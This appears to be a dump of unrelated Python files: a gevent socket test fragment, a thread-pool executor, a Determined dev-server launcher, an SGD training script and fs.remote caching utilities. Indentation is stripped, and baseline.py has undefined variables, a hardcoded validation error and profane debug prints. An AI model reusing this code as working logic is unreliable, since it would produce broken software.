exclude.append('gethostbyname_ex')
exclude.append('gethostbyaddr')
self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
def test_resolve_ipv6_scope_id(self):
from gevent import _socketcommon as SC
if not SC.__socket__.has_ipv6:
self.skipTest("Needs IPv6") # pragma: no cover
if not hasattr(SC.__socket__, 'inet_pton'):
self.skipTest("Needs inet_pton") # pragma: no cover
# A valid IPv6 address, with a scope.
addr = ('2607:f8b0:4000:80e::200e', 80, 0, 9)
# Mock socket
class sock(object):
family = SC.AF_INET6 # pylint:disable=no-member
self.assertIs(addr, SC._resolve_addr(sock, addr))
class TestSocket(greentest.TestCase):
def test_shutdown_when_closed(self):
# https://github.com/gevent/gevent/issues/1089
# we once raised an AttributeError.
s = socket.socket()
s.close()
with self.assertRaises(socket.error):
s.shutdown(socket.SHUT_RDWR)
if __name__ == '__main__':
greentest.main()
|
threadpoolexecutor.py
|
#!/usr/bin/env python
import logging
import os
from Queue import Queue
from threading import Thread, Condition
DEFAULT_NUMBER_OF_THREADS = 8
def get_number_of_cpus():
"""
Retrieves the number ot the available processors/cores/threads that can be used.
Uses the API from the os package. If this information cannot be retrieved,
returns the default value stored in DEFAULT_NUMBER_OF_THREADS constant.
:return: The number of available processors/cores/threads.
"""
try:
return os.sysconf("SC_NPROCESSORS_ONLN")
except Exception:
return DEFAULT_NUMBER_OF_THREADS
class ThreadPoolExecutorState(object):
"""
Represents the different states of the ThreadPoolExecutor class.
"""
NOT_STARTED = 1
RUNNING = 2
STOPPING = 3
STOPPED = 4
class ThreadPoolExecutor(object):
"""
Creates a pool of thread that can be reused for multiple tasks. The tasks are submitted to the executor
and it is responsible to deliver them to the working threads. The API allows its client to block until
the task execution completes or to continue its work while the threads are doing their job in the background.
A simple example of usage is as follows:
def task1(value):
...
def task2(value):
...
executor = ThreadPoolExecutor(16)
executor.start()
...
executor.submit(task1, value1)
executor.submit(task1, value2)
executor.submit(task2, value3)
executor.submit(task2, value4)
...
executor.shutdown(True)
"""
def __init__(self, size=get_number_of_cpus()):
self._queue = Queue()
self._size = size
self._pool = []
self._lock = Condition()
self._state = ThreadPoolExecutorState.NOT_STARTED
def execute_task():
while True:
with self._lock:
if self._state == ThreadPoolExecutorState.RUNNING:
if not self._queue.empty():
task, args = self._queue.get(False)
else:
logging.debug('Start waiting...')
self._lock.wait()
continue
elif self._state == ThreadPoolExecutorState.STOPPING:
if not self._queue.empty():
task, args = self._queue.get(False)
else:
break
elif self._state == ThreadPoolExecutorState.STOPPED:
break
else:
raise ValueError('Unknown state: %s', self._state)
if task:
try:
task(*args)
except Exception, ex:
logging.error('Error while executing task in the thread pool.')
logging.exception(ex)
logging.debug('Finished!')
for _ in range(size):
thread = Thread(target=execute_task)
thread.daemon = True
self._pool.append(thread)
def start(self):
"""
Starts the executor by spawning the needed threads.
"""
with self._lock:
self._validate_state(ThreadPoolExecutorState.NOT_STARTED)
self._state = ThreadPoolExecutorState.RUNNING
logging.debug('Spawning %s thread...', self._size)
for thread in self._pool:
thread.start()
def shutdown(self, blocking=True):
"""
Stops the executor. Stopping does not happen immediately, the worker threads will execute all the tasks
from the queue before stopping. The client can choose if to wait the stopping process to finish or
to allow this to happen in the background.
:param blocking: If should wait for the stopping process to finish by blocking the current thread.
"""
with self._lock:
self._validate_state(ThreadPoolExecutorState.RUNNING)
self._state = ThreadPoolExecutorState.STOPPING
logging.debug('Notify waiting threads')
self._lock.notifyAll()
logging.debug('Threads notified')
if blocking:
self._wait_threads_to_finish()
else:
wait_thread = Thread(target=self._wait_threads_to_finish())
wait_thread.start()
def _wait_threads_to_finish(self):
"""
Joins the worker threads to the current one and afther they finish changes the state
of the executor.
"""
for thread in self._pool:
logging.debug('Joining thread %s', thread)
thread.join()
with self._lock:
self._state = ThreadPoolExecutorState.STOPPED
def submit(self, task, *args):
"""
Submits a new task to the executor. The task should be callable and may take unnamed arguments
:param task: The task to be executed.
:param args: The parameters to be passed to the task in the moment of execution.
"""
with self._lock:
self._validate_state(ThreadPoolExecutorState.NOT_STARTED, ThreadPoolExecutorState.RUNNING)
self._queue.put((task, args), False)
self._lock.notify()
def _validate_state(self, *states):
"""
Validates if the current executor's state is in the given ones. If not, raise a ValueError.
:param states: The set of state to check for.
"""
if self._state not in states:
raise ValueError('Invalid state: %s' % self._state)
|
run-server.py
|
import multiprocessing as mp
import socket
import subprocess
import sys
import time
from typing import Callable, List, Optional
# While we could use something like requests (or any other 3rd-party module),
# this script aims to work with the default Python 3.6+.
CLEAR = "\033[39m"
MAGENTA = "\033[95m"
BLUE = "\033[94m"
DB_PORT = 5433
MASTER_PORT = 8081
def kill_process(name: str, process: Optional[mp.Process]) -> None:
if process is not None and process.is_alive():
try:
process.terminate()
except Exception:
print(f"failed to kill process: {name}")
def wait_for_server(port: int, host: str = "localhost", timeout: float = 5.0) -> None:
for _ in range(100):
try:
with socket.create_connection((host, port), timeout=timeout):
return
except OSError:
time.sleep(1)
print(f"Timed out waiting for the {host}:{port}.")
def proc(name: str, cmd: List[str], logs_handler: Callable = lambda x: x) -> mp.Process:
def func() -> None:
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as p:
try:
assert p.stdout is not None
for line in p.stdout:
print(logs_handler(line.decode("utf8")), end="", flush=True)
except KeyboardInterrupt:
print(f"Killing Log stream for {name}")
return mp.Process(target=func, daemon=True)
def tail_db_logs() -> mp.Process:
return proc("database-logs", ["docker-compose", "logs", "-f"])
def run_master() -> mp.Process:
return proc(
"master",
["../../../master/build/determined-master", "--config-file", "master.yaml"],
logs_handler=lambda line: f"{MAGENTA}determined-master |{CLEAR} {line}",
)
def run_agent() -> mp.Process:
container_master_host = "host.docker.internal" if sys.platform == "darwin" else ""
return proc(
"agent",
[
"../../../agent/build/determined-agent",
"run",
"--config-file",
"agent.yaml",
"--container-master-host",
container_master_host,
],
logs_handler=lambda line: f"{BLUE}determined-agent |{CLEAR} {line}",
)
def is_db_running() -> bool:
try:
with socket.create_connection(("localhost", DB_PORT), timeout=0.5):
return True
except OSError:
return False
def main() -> None:
db, master, agent, db_logs = False, None, None, None
try:
master = run_master()
agent = run_agent()
db_logs = tail_db_logs()
if not is_db_running():
db = True
subprocess.check_call(["docker-compose", "up", "-d"])
wait_for_server(DB_PORT)
db_logs.start()
master.start()
wait_for_server(MASTER_PORT)
agent.start()
# Join the agent first so we can exit if the agent fails to connect to
# the master.
agent.join()
if agent.exitcode != 0:
raise Exception(f"agent failed with non-zero exit code {agent.exitcode}")
master.join()
db_logs.join()
except KeyboardInterrupt:
pass
finally:
kill_process("master", master)
kill_process("agent", agent)
kill_process("db-logs", db_logs)
if db:
subprocess.check_call(["docker-compose", "down"])
if __name__ == "__main__":
main()
|
baseline.py
|
import os
import sys
from multiprocessing import Pool, Process, Queue, Manager
import numpy as np
import h5py as h5
import itertools
import random
import math
from sklearn import svm
from sklearn.linear_model import SGDRegressor
from sklearn.externals import joblib
from sklearn.metrics import mean_squared_error
from tqdm import tqdm
from datetime import datetime
random.seed(datetime.now())
def binSearch(arr, target):
low = 0
high = len(arr)
mid = (low + high)//2
found = False
if target < arr[0]:
return 0
while (not found):
if (target < arr[mid] and target >=arr[mid-1]):
found = True
elif (target >= arr[mid]):
low = mid+1
mid = (low+high)//2
else:
high = mid-1
mid = (low+high)//2
return mid
class Baseline:
train_split, val_split, test_split = .7,.1,.2
grid_dim, channels = 72, 6
chunk_size = 50
def __init__(self,db_path=None, storage_folder=None, batch_size=None, id=None):
if (id):
assert (os.path.isdir(os.path.join(storage_folder, 'tmp', str(id)))), "Unable to locate model " + str(id) + " in the specified storage folder" + storage_folder
self.id = id
self.existing_model = True
else:
self.id = random.randint(100000, 999999) #generate random 6-digit model id
self.existing_model = False
self.batch_size = batch_size
assert os.path.isfile(db_path), "Database does not exist in specified location: " + str(db_path)
None if os.path.isdir(storage_folder) else os.makedirs(storage_folder) #create dir if need be
None if os.path.isdir(os.path.join(storage_folder, 'tmp')) else os.makedirs(os.path.join(storage_folder, 'tmp'))
None if os.path.isdir(os.path.join(storage_folder, 'logs')) else os.makedirs(os.path.join(storage_folder, 'logs'))
self.storage_folder = storage_folder #storage folder for model and logs
self.model_folder = os.path.join(storage_folder, 'tmp', str(self.id))
self.log_folder = os.path.join(storage_folder, 'logs', str(self.id))
self.model_file = os.path.join(self.model_folder,str(self.id)+'.pkl')
self.db_path = db_path
self.db_file = h5.File(db_path, mode='r') #handle to file
self.chunk_names = [name for name in self.db_file['labels']]
self.data_chunks = [len(self.db_file['labels'][partition]) for partition in self.db_file['labels']]
self.chunk_thresholds = list(itertools.accumulate(self.data_chunks))
self.total_members = self.chunk_thresholds[-1]
self.train_members = int(round(self.train_split*self.total_members))
self.val_members = int(round(self.val_split*self.total_members))
self.test_members = int(round(self.test_split*self.total_members))
self.total_train_chunks = int(math.ceil(self.train_members/self.chunk_size))
self.total_val_chunks = int(math.ceil(self.val_members/self.chunk_size))
self.train_steps = int(math.ceil(self.chunk_size/batch_size))
self.val_steps = int(math.ceil(self.chunk_size/batch_size))
member_indices = list(range(self.total_members))
random.shuffle(member_indices)
self.train_indices = member_indices[:self.train_members]
self.val_indices = member_indices[self.train_members:self.train_members+self.val_members]
self.test_indices = member_indices[-self.test_members:]
self.train_db_index, self.val_db_index,self.test_db_index = 0,0,0
self.train_chunk_index, self.val_chunk_index = 0,0
self.epochs, self.optimal_epochs = 0, 0
self.min_epochs, self.stop_threshold = 0, 5
#self.master, self.subprocess = Pipe()
self.running_process = False
#self.val_queue = Queue()
self.max_num_processes = 5
self.concurrent_processes = Pool(processes=self.max_num_processes)
self.db_file.close()
def shuffle_train_data(self):
random.shuffle(self.train_indices)
self.train_db_index = 0
def shuffle_val_data(self):
random.shuffle(self.val_indices)
self.val_db_index = 0
def shuffle_test_data(self):
random.shuffle(self.test_indices)
self.test_db_index = 0
def next_train_chunk(self, chunks_processed, results):
hFile = h5.File(self.db_path, 'r', swmr=True)
chunk_size = self.chunk_size
if (self.train_members - chunks_processed) < chunk_size:
chunk_size = self.train_members%chunk_size
batch_ligands = np.zeros([chunk_size, self.grid_dim*self.grid_dim*self.grid_dim*self.channels], dtype=np.float32)
batch_energies = np.zeros([chunk_size], dtype=np.float32)
for i in range(chunks_processed, chunks_processed+chunk_size):
file_index = binSearch(self.chunk_thresholds, self.train_indices[i])
filename = str(self.chunk_names[file_index])
chunk_index = (self.chunk_thresholds[file_index]-self.chunk_thresholds[file_index-1]-1) if file_index > 0 else self.train_indices[i]
batch_ligands[i-chunks_processed] = hFile['ligands'][filename][chunk_index].flatten()
batch_energies[i-chunks_processed] = hFile['labels'][filename][chunk_index]
results.put([batch_ligands, batch_energies])
hFile.close()
return
def next_val_chunk(self, chunks_processed, results):
hFile = h5.File(self.db_path, 'r', swmr=True)
chunk_size = self.chunk_size
if (self.val_members - chunks_processed) < chunk_size:
chunk_size = self.val_members%chunk_size
batch_ligands = np.zeros([chunk_size, self.grid_dim*self.grid_dim*self.grid_dim*self.channels], dtype=np.float32)
batch_energies = np.zeros([chunk_size], dtype=np.float32)
for i in range(chunks_processed, chunks_processed+chunk_size):
file_index = binSearch(self.chunk_thresholds, self.val_indices[i])
filename = str(self.chunk_names[file_index])
chunk_index = (self.chunk_thresholds[file_index]-self.chunk_thresholds[file_index-1]-1) if file_index > 0 else self.val_indices[i]
batch_ligands[i-chunks_processed] = hFile['ligands'][filename][chunk_index].flatten()
batch_energies[i-chunks_processed] = hFile['labels'][filename][chunk_index]
results.put([batch_ligands, batch_energies])
hFile.close()
return
def next_train_batch(self, chunk_size):
flag = False
chunk_index = self.train_chunk_index
batch_size = self.batch_size
if (chunk_index + batch_size) > chunk_size:
flag = True
batch_size = chunk_size%batch_size
batch_ligands = self.train_receiver[0][chunk_index:chunk_index+batch_size]
batch_labels = self.train_receiver[1][chunk_index:chunk_index+batch_size]
if flag:
chunk_index = 0
else:
chunk_index += batch_size
self.train_chunk_index = chunk_index
return batch_ligands, batch_labels
def next_val_batch(self, chunk_size):
flag = False
batch_index = self.val_chunk_index
batch_size = self.batch_size
if (chunk_index + batch_size) > chunk_size:
flag = True
batch_size = chunk_size%batch_size
batch_ligands = self.val_receiver[0][batch_index:batch_index+batch_size]
batch_labels = self.val_receiver[1][chunk_index:batch_index+batch_size]
print(batch_labels)
if flag:
chunk_index = 0
else:
chunk_index += chunk_size
self.val_chunk_index = chunk_index
return batch_ligands, batch_labels
def train(self):
if (self.existing_model):
model = joblib.load(self.model_file)
else:
model = SGDRegressor()
lowest_err = float('inf')
stop_iter = 0
manager = Manager()
results = manager.Queue()
total_processes = int(self.train_members//(self.chunk_size*self.max_num_processes))
remain_ligands = self.train_members%(self.chunk_size*self.max_num_processes)
remain_processes = remain_ligands//(self.chunk_size)
final_process_ligands = remain_ligands%self.chunk_size
while True:
self.shuffle_train_data()
jobs = []
process_count = 0
for i in range(self.train_db_index,self.chunk_size*self.max_num_processes,self.chunk_size):
p = Process(target=self.next_train_chunk, args=(i,results))
jobs.append(p)
p.start()
print("starting process: ", process_count)
process_count+=1
self.train_db_index += self.chunk_size*self.max_num_processes
processing_epoch = True
chunk_num = 1
while (chunk_num < total_processes+1):
self.train_receiver = results.get(True)
if results.empty() and chunk_num < total_processes-1:
for p in jobs:
p.terminate()
p.join()
print("did we at least finish joining holy fuck")
for i in range(self.train_db_index,self.chunk_size*self.max_num_processes,self.chunk_size):
print("are we getting to p assignment")
p = Process(target=self.next_train_chunk, args=(i,results))
jobs.append(p)
print("is this where the deadlock is")
p.start()
print("starting process: ",process_count)
process_count+=1
self.train_db_index += self.chunk_size*self.max_num_processes
chunk_num+=1
if chunk_num == total_processes-1:
for i in range(self.train_db_index,self.chunk_size*remain_processes,self.chunk_size):
p = Process(target=self.next_train_chunk, args=(i,results))
jobs.append(p)
p.start()
chunk_num+=1
self.train_db_index = 0
chunk_size = self.train_receiver[1].shape[0]
self.train_chunk_index = 0
for batch in tqdm(range(self.train_steps), desc = "Training Model " + str(self.id) + " - Epoch " + str(self.epochs+1)):
ligands, labels = self.next_train_batch(chunk_size)
model.partial_fit(ligands, labels)
print("reached validation")
#val_err = self.validate(model)
val_err = 5
self.epochs+=1
if (val_err < lowest_err):
lowest_err = val_err
joblib.dump(model, self.model_file)
stop_iter = 0
self.optimal_epochs = self.epochs
else:
stop_iter+=1
if (stop_iter > self.stop_threshold):
print("Finished Training...\n")
print("\nValidation Set Error:", lowest_err)
return
def validate(self, model):
self.shuffle_val_data()
total_mse = 0
manager = Manager()
results = managers.Queue()
jobs = []
for i in range(self.train_db_index,self.chunk_size*self.max_num_processes,self.chunk_size):
p = Process(target=self.next_train_chunk, args=(i,results))
jobs.append(p)
p.start()
processing_val_set = True
step_count = 0
while (processing_val_set):
self.val_receiver = self.val_queue.get(True)
chunk_size = self.val_receiver[1].shape[0]
for batch in range(self.val_steps):
ligands, labels = self.next_val_batch(chunk_size)
predictions = model.predict(ligands)
mse = mean_squared_error(labels, predictions)
total_mse += mse
if (chunk_size != self.chunk_size):
processing_val_set = False
return total_mse/(self.chunk_size*self.total_val_chunks)
|
remote.py
|
"""
fs.remote
=========
Utilities for interfacing with remote filesystems
This module provides reusable utility functions that can be used to construct
FS subclasses interfacing with a remote filesystem. These include:
* RemoteFileBuffer: a file-like object that locally buffers the contents of
a remote file, writing them back on flush() or close().
* ConnectionManagerFS: a WrapFS subclass that tracks the connection state
of a remote FS, and allows client code to wait for
a connection to be re-established.
* CacheFS: a WrapFS subclass that caches file and directory meta-data in
memory, to speed access to a remote FS.
"""
from __future__ import with_statement
import time
import stat as statinfo
from errno import EINVAL
import fs.utils
from fs.base import threading, FS
from fs.wrapfs import WrapFS, wrap_fs_methods
from fs.wrapfs.lazyfs import LazyFS
from fs.path import *
from fs.errors import *
from fs.local_functools import wraps
from fs.filelike import StringIO, SpooledTemporaryFile, FileWrapper
from fs import SEEK_SET, SEEK_CUR, SEEK_END
_SENTINAL = object()
from six import PY3, b
class RemoteFileBuffer(FileWrapper):
"""File-like object providing buffer for local file operations.
Instances of this class manage a local tempfile buffer corresponding
to the contents of a remote file. All reads and writes happen locally,
with the content being copied to the remote file only on flush() or
close(). Writes to the remote file are performed using the setcontents()
method on the owning FS object.
The intended use-case is for a remote filesystem (e.g. S3FS) to return
instances of this class from its open() method, and to provide the
file-uploading logic in its setcontents() method, as in the following
pseudo-code::
def open(self,path,mode="r"):
rf = self._get_remote_file(path)
return RemoteFileBuffer(self,path,mode,rf)
def setcontents(self,path,file):
self._put_remote_file(path,file)
The contents of the remote file are read into the buffer on-demand.
"""
max_size_in_memory = 1024 * 8
def __init__(self, fs, path, mode, rfile=None, write_on_flush=True):
"""RemoteFileBuffer constructor.
The owning filesystem, path and mode must be provided. If the
optional argument 'rfile' is provided, it must be a read()-able
object or a string containing the initial file contents.
"""
wrapped_file = SpooledTemporaryFile(max_size=self.max_size_in_memory)
self.fs = fs
self.path = path
self.write_on_flush = write_on_flush
self._changed = False
self._readlen = 0 # How many bytes already loaded from rfile
self._rfile = None # Reference to remote file object
self._eof = False # Reached end of rfile?
if getattr(fs, "_lock", None) is not None:
self._lock = fs._lock.__class__()
else:
self._lock = threading.RLock()
if "r" in mode or "+" in mode or "a" in mode:
if rfile is None:
# File was just created, force to write anything
self._changed = True
self._eof = True
if not hasattr(rfile, "read"):
#rfile = StringIO(unicode(rfile))
rfile = StringIO(rfile)
self._rfile = rfile
else:
# Do not use remote file object
self._eof = True
self._rfile = None
self._changed = True
if rfile is not None and hasattr(rfile,"close"):
rfile.close()
super(RemoteFileBuffer,self).__init__(wrapped_file,mode)
# FIXME: What if mode with position on eof?
if "a" in mode:
# Not good enough...
self.seek(0, SEEK_END)
def __del__(self):
# Don't try to close a partially-constructed file
if "_lock" in self.__dict__:
if not self.closed:
try:
self.close()
except FSError:
pass
def _write(self,data,flushing=False):
with self._lock:
# Do we need to discard info from the buffer?
toread = len(data) - (self._readlen - self.wrapped_file.tell())
if toread > 0:
if not self._eof:
self._fillbuffer(toread)
else:
self._readlen += toread
self._changed = True
self.wrapped_file.write(data)
def _read_remote(self, length=None):
"""Read data from the remote file into the local buffer."""
chunklen = 1024 * 256
bytes_read = 0
while True:
toread = chunklen
if length is not None and length - bytes_read < chunklen:
toread = length - bytes_read
if not toread:
break
data = self._rfile.read(toread)
datalen = len(data)
if not datalen:
self._eof = True
break
bytes_read += datalen
self.wrapped_file.write(data)
if datalen < toread:
# We reached EOF,
# no more reads needed
self._eof = True
break
if self._eof and self._rfile is not None:
self._rfile.close()
self._readlen += bytes_read
def _fillbuffer(self, length=None):
"""Fill the local buffer, leaving file position unchanged.
This method is used for on-demand loading of data from the remote file
into the buffer. It reads 'length' bytes from rfile and writes them
into the buffer, seeking back to the original file position.
"""
curpos = self.wrapped_file.tell()
if length == None:
if not self._eof:
# Read all data and we didn't reached EOF
# Merge endpos - tell + bytes from rfile
self.wrapped_file.seek(0, SEEK_END)
self._read_remote()
self._eof = True
self.wrapped_file.seek(curpos)
elif not self._eof:
if curpos + length > self._readlen:
# Read all data and we didn't reached EOF
# Load endpos - tell() + len bytes from rfile
toload = length - (self._readlen - curpos)
self.wrapped_file.seek(0, SEEK_END)
self._read_remote(toload)
self.wrapped_file.seek(curpos)
def _read(self, length=None):
if length is not None and length < 0:
length = None
with self._lock:
self._fillbuffer(length)
data = self.wrapped_file.read(length if length != None else -1)
if not data:
data = None
return data
def _seek(self,offset,whence=SEEK_SET):
with self._lock:
if not self._eof:
# Count absolute position of seeking
if whence == SEEK_SET:
abspos = offset
elif whence == SEEK_CUR:
abspos = offset + self.wrapped_file.tell()
elif whence == SEEK_END:
abspos = None
else:
raise IOError(EINVAL, 'Invalid whence')
if abspos != None:
toread = abspos - self._readlen
if toread > 0:
self.wrapped_file.seek(self._readlen)
self._fillbuffer(toread)
else:
self.wrapped_file.seek(self._readlen)
self._fillbuffer()
self.wrapped_file.seek(offset, whence)
def _truncate(self,size):
with self._lock:
if not self._eof and self._readlen < size:
# Read the rest of file
self._fillbuffer(size - self._readlen)
# Lock rfile
self._eof = True
elif self._readlen >= size:
# Crop rfile metadata
self._readlen = size if size != None else 0
# Lock rfile
self._eof = True
self.wrapped_file.truncate(size)
self._changed = True
self.flush()
if self._rfile is not None:
self._rfile.close()
def flush(self):
with self._lock:
self.wrapped_file.flush()
if self.write_on_flush:
self._setcontents()
def _setcontents(self):
if not self._changed:
# Nothing changed, no need to write data back
return
# If not all data loaded, load until eof
if not self._eof:
self._fillbuffer()
if "w" in self.mode or "a" in self.mode or "+" in self.mode:
pos = self.wrapped_file.tell()
self.wrapped_file.seek(0)
self.fs.setcontents(self.path, self.wrapped_file)
self.wrapped_file.seek(pos)
def close(self):
with self._lock:
if not self.closed:
self._setcontents()
if self._rfile is not None:
self._rfile.close()
super(RemoteFileBuffer,self).close()
class ConnectionManagerFS(LazyFS):
"""FS wrapper providing simple connection management of a remote FS.
The ConnectionManagerFS class is designed to wrap a remote FS object
and provide some convenience methods for dealing with its remote
connection state.
The boolean attribute 'connected' indicates whether the remote filesystem
has an active connection, and is initially True. If any of the remote
filesystem methods raises a RemoteConnectionError, 'connected' will
switch to False and remain so until a successful remote method call.
Application code can use the method 'wait_for_connection' to block
until the connection is re-established. Currently this reconnection
is checked by a simple polling loop; eventually more sophisticated
operating-system integration may be added.
Since some remote FS classes can raise RemoteConnectionError during
initialization, this class makes use of lazy initialization. The
remote FS can be specified as an FS instance, an FS subclass, or a
(class,args) or (class,args,kwds) tuple. For example::
>>> fs = ConnectionManagerFS(MyRemoteFS("http://www.example.com/"))
Traceback (most recent call last):
...
RemoteConnectionError: couldn't connect to "http://www.example.com/"
>>> fs = ConnectionManagerFS((MyRemoteFS,["http://www.example.com/"]))
>>> fs.connected
False
>>>
"""
poll_interval = 1
def __init__(self,wrapped_fs,poll_interval=None,connected=True):
super(ConnectionManagerFS,self).__init__(wrapped_fs)
if poll_interval is not None:
self.poll_interval = poll_interval
self._connection_cond = threading.Condition()
self._poll_thread = None
self._poll_sleeper = threading.Event()
self.connected = connected
def setcontents(self, path, data=b'', encoding=None, errors=None, chunk_size=64*1024):
return self.wrapped_fs.setcontents(path, data, encoding=encoding, errors=errors, chunk_size=chunk_size)
def __getstate__(self):
state = super(ConnectionManagerFS,self).__getstate__()
del state["_connection_cond"]
del state["_poll_sleeper"]
state["_poll_thread"] = None
return state
def __setstate__(self,state):
super(ConnectionManagerFS,self).__setstate__(state)
self._connection_cond = threading.Condition()
self._poll_sleeper = threading.Event()
def wait_for_connection(self,timeout=None,force_wait=False):
self._connection_cond.acquire()
try:
if force_wait:
self.connected = False
if not self.connected:
if not self._poll_thread:
target = self._poll_connection
self._poll_thread = threading.Thread(target=target)
self._poll_thread.daemon = True
self._poll_thread.start()
self._connection_cond.wait(timeout)
finally:
self._connection_cond.release()
def _poll_connection(self):
while not self.connected and not self.closed:
try:
self.wrapped_fs.getinfo("/")
except RemoteConnectionError:
self._poll_sleeper.wait(self.poll_interval)
self._poll_sleeper.clear()
except FSError:
break
else:
break
self._connection_cond.acquire()
try:
if not self.closed:
self.connected = True
self._poll_thread = None
self._connection_cond.notifyAll()
finally:
self._connection_cond.release()
def close(self):
if not self.closed:
try:
super(ConnectionManagerFS,self).close()
except (RemoteConnectionError,):
pass
if self._poll_thread:
self.connected = True
self._poll_sleeper.set()
self._poll_thread.join()
self._poll_thread = None
def _ConnectionManagerFS_method_wrapper(func):
"""Method wrapper for ConnectionManagerFS.
This method wrapper keeps an eye out for RemoteConnectionErrors and
adjusts self.connected accordingly.
"""
@wraps(func)
def wrapper(self,*args,**kwds):
try:
result = func(self,*args,**kwds)
except RemoteConnectionError:
self.connected = False
raise
except FSError:
self.connected = True
raise
else:
self.connected = True
return result
return wrapper
wrap_fs_methods(_ConnectionManagerFS_method_wrapper,ConnectionManagerFS)
class CachedInfo(object):
"""Info objects stored in cache for CacheFS."""
__slots__ = ("timestamp","info","has_full_info","has_full_children")
def __init__(self,info={},has_full_info=True,has_full_children=False):
self.timestamp = time.time()
self.info = info
self.has_full_info = has_full_info
self.has_full_children = has_full_children
def clone(self):
new_ci = self.__class__()
new_ci.update_from(self)
return new_ci
def update_from(self,other):
self.timestamp = other.timestamp
self.info = other.info
self.has_full_info = other.has_full_info
self.has_full_children = other.has_full_children
@classmethod
def new_file_stub(cls):
info = {"info" : 0700 | statinfo.S_IFREG}
return cls(info,has_full_info=False)
@classmethod
def new_dir_stub(cls):
info = {"info" : 0700 | statinfo.S_IFDIR}
return cls(info,has_full_info=False)
class CacheFSMixin(FS):
"""Simple FS mixin to cache meta-data of a remote filesystems.
This FS mixin implements a simplistic cache that can help speed up
access to a remote filesystem. File and directory meta-data is cached
but the actual file contents are not.
If you want to add caching to an existing FS object, use the CacheFS
class instead; it's an easy-to-use wrapper rather than a mixin.
This mixin class is provided for FS implementors who want to use
caching internally in their own classes.
FYI, the implementation of CacheFS is this:
class CacheFS(CacheFSMixin,WrapFS):
pass
"""
def __init__(self,*args,**kwds):
"""CacheFSMixin constructor.
The optional keyword argument 'cache_timeout' specifies the cache
timeout in seconds. The default timeout is 1 second. To prevent
cache entries from ever timing out, set it to None.
The optional keyword argument 'max_cache_size' specifies the maximum
number of entries to keep in the cache. To allow the cache to grow
without bound, set it to None. The default is 1000.
"""
self.cache_timeout = kwds.pop("cache_timeout",1)
self.max_cache_size = kwds.pop("max_cache_size",1000)
self.__cache = PathMap()
self.__cache_size = 0
self.__cache_lock = threading.RLock()
super(CacheFSMixin,self).__init__(*args,**kwds)
def clear_cache(self,path=""):
with self.__cache_lock:
self.__cache.clear(path)
try:
scc = super(CacheFSMixin,self).clear_cache
except AttributeError:
pass
else:
scc()
def __getstate__(self):
state = super(CacheFSMixin,self).__getstate__()
state.pop("_CacheFSMixin__cache",None)
state.pop("_CacheFSMixin__cache_size",None)
state.pop("_CacheFSMixin__cache_lock",None)
return state
def __setstate__(self,state):
super(CacheFSMixin,self).__setstate__(state)
self.__cache = PathMap()
self.__cache_size = 0
self.__cache_lock = threading.RLock()
def __get_cached_info(self,path,default=_SENTINAL):
try:
info = self.__cache[path]
if self.cache_timeout is not None:
now = time.time()
if info.timestamp < (now - self.cache_timeout):
with self.__cache_lock:
self.__expire_from_cache(path)
raise KeyError
return info
except KeyError:
if default is not _SENTINAL:
return default
raise
def __set_cached_info(self,path,new_ci,old_ci=None):
was_room = True
with self.__cache_lock:
# Free up some room in the cache
if self.max_cache_size is not None and old_ci is None:
while self.__cache_size >= self.max_cache_size:
try:
to_del = iter(self.__cache).next()
except StopIteration:
break
else:
was_room = False
self.__expire_from_cache(to_del)
# Atomically add to the cache.
# If there's a race, newest information wins
ci = self.__cache.setdefault(path,new_ci)
if ci is new_ci:
self.__cache_size += 1
else:
if old_ci is None or ci is old_ci:
if ci.timestamp < new_ci.timestamp:
ci.update_from(new_ci)
return was_room
def __expire_from_cache(self,path):
del self.__cache[path]
self.__cache_size -= 1
for ancestor in recursepath(path):
try:
self.__cache[ancestor].has_full_children = False
except KeyError:
pass
def open(self, path, mode='r', buffering=-1, encoding=None, errors=None, newline=None, line_buffering=False, **kwargs):
# Try to validate the entry using the cached info
try:
ci = self.__get_cached_info(path)
except KeyError:
if path in ("", "/"):
raise ResourceInvalidError(path)
try:
ppath = dirname(path)
pci = self.__get_cached_info(ppath)
except KeyError:
pass
else:
if not fs.utils.isdir(super(CacheFSMixin, self), ppath, pci.info):
raise ResourceInvalidError(path)
if pci.has_full_children:
raise ResourceNotFoundError(path)
else:
if not fs.utils.isfile(super(CacheFSMixin, self), path, ci.info):
raise ResourceInvalidError(path)
f = super(CacheFSMixin, self).open(path, mode=mode, buffering=buffering, encoding=encoding, errors=errors, newline=newline, line_buffering=line_buffering, **kwargs)
if "w" in mode or "a" in mode or "+" in mode:
with self.__cache_lock:
self.__cache.clear(path)
f = self._CacheInvalidatingFile(self, path, f, mode)
return f
class _CacheInvalidatingFile(FileWrapper):
def __init__(self, owner, path, wrapped_file, mode=None):
self.path = path
sup = super(CacheFSMixin._CacheInvalidatingFile, self)
sup.__init__(wrapped_file, mode)
self.owner = owner
def _write(self, string, flushing=False):
with self.owner._CacheFSMixin__cache_lock:
self.owner._CacheFSMixin__cache.clear(self.path)
sup = super(CacheFSMixin._CacheInvalidatingFile, self)
return sup._write(string, flushing=flushing)
def _truncate(self, size):
with self.owner._CacheFSMixin__cache_lock:
self.owner._CacheFSMixin__cache.clear(self.path)
sup = super(CacheFSMixin._CacheInvalidatingFile, self)
return sup._truncate(size)
def exists(self, path):
try:
self.getinfo(path)
except ResourceNotFoundError:
return False
else:
return True
def isdir(self, path):
try:
self.__cache.iternames(path).next()
return True
except StopIteration:
pass
except RuntimeError:
pass
try:
info = self.getinfo(path)
except ResourceNotFoundError:
return False
else:
return fs.utils.isdir(super(CacheFSMixin, self), path, info)
def isfile(self, path):
try:
self.__cache.iternames(path).next()
return False
except StopIteration:
pass
except RuntimeError:
pass
try:
info = self.getinfo(path)
except ResourceNotFoundError:
return False
else:
return fs.utils.isfile(super(CacheFSMixin, self), path, info)
def getinfo(self, path):
try:
ci = self.__get_cached_info(path)
if not ci.has_full_info:
raise KeyError
info = ci.info
except KeyError:
info = super(CacheFSMixin, self).getinfo(path)
self.__set_cached_info(path, CachedInfo(info))
return info
def listdir(self,path="",*args,**kwds):
return list(nm for (nm, _info) in self.listdirinfo(path,*args,**kwds))
def ilistdir(self,path="",*args,**kwds):
for (nm, _info) in self.ilistdirinfo(path,*args,**kwds):
yield nm
def listdirinfo(self,path="",*args,**kwds):
items = super(CacheFSMixin,self).listdirinfo(path,*args,**kwds)
with self.__cache_lock:
names = set()
for (nm,info) in items:
names.add(basename(nm))
